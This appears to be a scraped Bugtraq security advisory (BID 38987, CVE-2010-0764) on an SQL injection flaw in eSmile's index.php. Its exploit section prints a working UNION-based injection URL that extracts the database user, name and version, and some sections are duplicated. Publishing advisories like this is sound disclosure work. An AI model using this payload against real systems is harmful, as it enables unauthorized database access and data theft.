eSmile 'index.php' SQL Injection Vulnerability
BID:38987
Info
eSmile 'index.php' SQL Injection Vulnerability
| Bugtraq ID: | 38987 |
| Class: | Input Validation Error |
| CVE: |
CVE-2010-0764 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 10 2010 12:00AM |
| Updated: | Feb 10 2010 12:00AM |
| Credit: | AtT4CKxT3rR0r1ST |
| Vulnerable: |
KuwaitPHP eSmile 0 |
| Not Vulnerable: | |
Discussion
eSmile 'index.php' SQL Injection Vulnerability
eSmile is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
eSmile is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
eSmile 'index.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following exploit is available:
www.example.com/index.php?do=show&cid=-NULL'/**/UNION/**/ALL/**/SELECT/**/111,222,333,444,555,CONCAT_WS(CHAR(32,58,32),user(),database(),version())-- -
Attackers can use a browser to exploit this issue.
The following exploit is available:
www.example.com/index.php?do=show&cid=-NULL'/**/UNION/**/ALL/**/SELECT/**/111,222,333,444,555,CONCAT_WS(CHAR(32,58,32),user(),database(),version())-- -
Solution / Fix
eSmile 'index.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
eSmile 'index.php' SQL Injection Vulnerability
References:
References:
- eSmile Script (index.php) SQL Injection Vulnerability (AtT4CKxT3rR0r1ST)